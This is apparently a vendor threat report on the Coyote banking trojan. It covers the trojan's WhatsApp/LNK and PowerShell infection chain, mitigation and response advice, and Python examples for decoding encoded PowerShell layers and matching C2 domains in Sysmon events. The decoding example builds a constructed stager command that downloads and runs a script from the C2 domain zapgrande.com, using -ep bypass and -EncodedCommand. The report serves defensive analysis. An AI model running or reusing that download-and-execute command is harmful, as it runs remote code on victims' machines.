
12 Nov 2025 16:49

Coyote Banking Malware: SOC Threat Report

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Coyote Banking Trojan Analysis

The Coyote Banking Trojan is an advanced strain of Brazilian financial malware, closely linked to the Maverick campaign. Delivered through malicious LNK files disguised as WhatsApp downloads, Coyote uses a multi-stage PowerShell infection chain, reflective .NET loaders, and encrypted command-and-control (C2) communications. Once running, it targets Brazilian financial and cryptocurrency service websites, harvesting credentials and manipulating transactions. This report gives security operations center (SOC) teams actionable intelligence, indicators of compromise (IOCs), and defensive measures to detect, contain, and simulate Coyote-style intrusions.

Coyote Malware Investigation

Security researchers identified that Coyote infections originate from malicious ZIP archives downloaded via web.whatsapp.com. Inside these archives, shortcut (LNK) files launch nested PowerShell commands encoded as Base64 over UTF-16LE (the format PowerShell's -EncodedCommand switch expects), which retrieve further scripts from zapgrande[.]com. The initial loader disables Microsoft Defender and UAC before deploying a .NET reflective loader that executes payloads directly in memory, leaving no payload file on disk. Persistence is maintained via a batch file (“HealthApp-<GUID>.bat”) placed in the Startup folder. The malware checks that the victim's locale is Brazilian, enumerates installed browsers, and matches browser activity against its list of target banking URLs, which it unpacks at runtime with AES-CBC decryption and GZIP decompression routines. Code overlaps and shared encryption logic link Coyote to the Maverick Trojan family.
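The nested Base64/UTF-16LE encoding described above is the first thing an analyst has to unwind when triaging one of these LNK command lines. The following is an added example for this report, not SOC Prime's or the malware's code: it peels every -EncodedCommand layer, pulls out the URLs the decoded stages fetch, and flags any that land on the C2 domains named in the report. The sample command line is constructed; only the domain zapgrande.com comes from the report, while the script path (stage2.ps1), the PowerShell switches, and the two-layer structure are assumptions about what a stager of this kind looks like.

```python
"""Peel nested PowerShell -EncodedCommand layers and pull out the URLs they fetch.

Added example for the report, not SOC Prime's or the malware's code.
The LNK command line below is constructed for illustration: only the domain
zapgrande.com comes from the report; the script path and the PowerShell
switches are assumptions about what a stager might look like.
"""
import base64
import re
from urllib.parse import urlparse

# PowerShell accepts several abbreviations of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)
KNOWN_C2 = ("zapgrande.com", "sorvetenopote.com")  # domains from the report


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_layers(command_line: str, max_depth: int = 8) -> list:
    """Decode every nested -EncodedCommand layer, outermost first.

    Stops when no encoded flag remains, the blob is not valid UTF-16LE,
    or max_depth is hit (a guard against pathological nesting).
    """
    layers = []
    current = command_line
    for _ in range(max_depth):
        match = ENCODED_FLAG.search(current)
        if not match:
            break
        blob = match.group(1)
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # tolerate stripped padding
        try:
            current = raw.decode("utf-16-le")
        except UnicodeDecodeError:
            break
        layers.append(current)
    return layers


def extract_urls(scripts) -> list:
    """Collect every http(s) URL appearing in the decoded scripts."""
    return [u for s in scripts for u in URL_RE.findall(s)]


def c2_hits(urls) -> list:
    """Return hostnames that are a known C2 domain or a subdomain of one."""
    hits = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in KNOWN_C2):
            hits.append(host)
    return hits


def analyze(command_line: str) -> dict:
    """One-shot triage of a suspicious command line."""
    layers = decode_layers(command_line)
    urls = extract_urls(layers)
    return {"layers": len(layers), "urls": urls, "c2_hits": c2_hits(urls)}


# --- constructed sample: a two-layer stager like the one the report describes ---
INNER = "IEX (New-Object Net.WebClient).DownloadString('https://zapgrande.com/stage2.ps1')"
MIDDLE = f"powershell.exe -nop -w hidden -EncodedCommand {encode_powershell(INNER)}"
LNK_COMMAND_LINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc "
    + encode_powershell(MIDDLE)
)

if __name__ == "__main__":
    print(analyze(LNK_COMMAND_LINE))
```

The host comparison is anchored on a label boundary (exact match or `.` + domain) so that a look-alike such as notzapgrande.com does not count as a hit; the same anchoring matters when the IOC list is turned into a SIEM rule.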

Coyote Trojan Mitigation

SOC teams should prioritize a layered defense against Coyote's infection chain. Restrict employee access to WhatsApp Web and similar messaging services where the business allows it, and run awareness training that covers phishing delivered through messaging apps rather than only email. Deploy endpoint detection and response (EDR) tooling that flags encoded PowerShell command lines, reflective .NET assembly loading, and unauthorized batch files written to Startup folders. Block the known C2 domains zapgrande[.]com and sorvetenopote[.]com at the DNS and proxy layers. Enable PowerShell script block and module logging so decoded content reaches the SIEM, and constrain PowerShell with Constrained Language Mode or application control (AppLocker/WDAC) rather than relying on the execution policy alone: the execution policy is not a security boundary, applies only to script files, and is bypassed outright by -ExecutionPolicy Bypass or by passing the payload through -EncodedCommand. Keep antivirus signatures and behavioral rules updated to catch emerging variants.

Response to Coyote Bank Malware

Upon detection, incident responders should isolate affected endpoints immediately and run threat-hunting queries in Microsoft Defender for Endpoint (or the organization's SIEM) for PowerShell executions spawned from archives downloaded via WhatsApp Web. Quarantine or delete LNK, ZIP, and batch files matching known IOCs, and block the associated C2 infrastructure at the firewall and DNS layers. Remove any HealthApp-*.bat persistence artifacts from Startup folders, reset banking credentials that may have been exposed, and enforce multi-factor authentication across financial platforms. Because the loader and payloads run in memory, a file-system scan alone cannot confirm eradication: capture memory before rebooting where possible and complete a forensic review of in-memory loaders and secondary payloads, and remove the Startup batch file first, since a reboot clears the in-memory stages but the persistence entry relaunches the chain at the next logon.

Coyote Attack Flow

Simulations

Executive Summary

Test Case ID: TC-20251112-A7Z3K
TTPs: T1102.001, T1102
Detection Rule Logic Summary: Detects outbound network connections where the destination hostname matches known Coyote malware C2 domains (zapgrande.com or sorvetenopote.com).
Detection Rule Language/Format: Sigma
Target Security Environment:
  • OS: Windows 10/Server 2019 (or later)
  • Logging: Windows network connection logs (Windows Filtering Platform, Sysmon NetworkConnect events, DNS query logs)
  • Security Stack: SIEM/EDR capable of ingesting Windows logs (e.g., Microsoft Sentinel, Splunk, Elastic, QRadar)
Resilience Score (1-5): 2
Justification: The rule relies solely…
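To make the test case concrete, here is an added example (not SOC Prime's Sigma rule, which is not reproduced on this page) that renders the rule logic summarized above in Python and runs it over constructed Sysmon NetworkConnect (Event ID 3) and DNS query (Event ID 22) events. Only the two C2 domains come from the report; the events, the chrome.exe path, and the IP 198.51.100.23 (a documentation address standing in for rotated infrastructure) are constructed. The example also shows two things the resilience score reflects: an unanchored suffix match fires on a look-alike domain, and a connection to a domain or IP outside the IOC list produces no alert at all, which is why the PowerShell-egress list at the end is the natural hunting pivot.

```python
"""Apply the test case's detection logic to constructed Windows events.

Added example: a Python rendering of the rule logic summarized in the test
case, not SOC Prime's Sigma rule itself. The events are constructed (Sysmon
Event ID 3 NetworkConnect and Event ID 22 DNS query field names); only the two
C2 domains come from the report, and 198.51.100.23 is a documentation address
standing in for rotated infrastructure.
"""

C2_DOMAINS = ("zapgrande.com", "sorvetenopote.com")

# Sigma-equivalent of the rule summary, for reference:
#   detection:
#     selection:
#       DestinationHostname|endswith: ['zapgrande.com', 'sorvetenopote.com']
#     condition: selection
# Pitfall shown below: a bare |endswith also matches 'notzapgrande.com'.


def hostname_of(event: dict) -> str:
    """Hostname (or, failing that, destination IP) from a network or DNS event."""
    host = (
        event.get("DestinationHostname")
        or event.get("QueryName")
        or event.get("DestinationIp")
        or ""
    )
    return host.rstrip(".").lower()  # DNS logs may carry a trailing dot


def is_c2_domain(host: str) -> bool:
    """True for an exact C2 domain or one of its subdomains (label-anchored)."""
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def naive_endswith(host: str) -> bool:
    """Unanchored suffix test, included only to show the false positive."""
    return any(host.endswith(d) for d in C2_DOMAINS)


def evaluate(events) -> list:
    """Hostnames the rule fires on, in input order."""
    return [hostname_of(e) for e in events if is_c2_domain(hostname_of(e))]


def naive_evaluate(events) -> list:
    """Same rule with the unanchored suffix test."""
    return [hostname_of(e) for e in events if naive_endswith(hostname_of(e))]


def powershell_egress_not_flagged(events) -> list:
    """Hunting pivot: PowerShell-originated egress the domain rule cannot see.

    A rotated domain or a direct-IP connection produces no alert from an
    IOC-only rule; this is where an analyst looks next.
    """
    return [
        hostname_of(e)
        for e in events
        if e.get("Image", "").lower().endswith("powershell.exe")
        and not is_c2_domain(hostname_of(e))
    ]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example
    {"EventID": 3, "Image": PS, "DestinationHostname": "zapgrande.com", "DestinationPort": 443},
    {"EventID": 22, "Image": PS, "QueryName": "cdn.sorvetenopote.com."},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "www.example.com", "DestinationPort": 443},
    {"EventID": 3, "Image": PS, "DestinationHostname": "notzapgrande.com", "DestinationPort": 443},
    {"EventID": 3, "Image": PS, "DestinationIp": "198.51.100.23", "DestinationPort": 443},
]

if __name__ == "__main__":
    print("rule hits:        ", evaluate(SAMPLE_EVENTS))
    print("naive endswith:   ", naive_evaluate(SAMPLE_EVENTS))
    print("PS egress unseen: ", powershell_egress_not_flagged(SAMPLE_EVENTS))
```

When porting the rule to a real Sigma backend, express the suffix as `'.zapgrande.com'` alongside an exact match rather than a bare `'zapgrande.com'`, or the look-alike case above becomes a false positive in production.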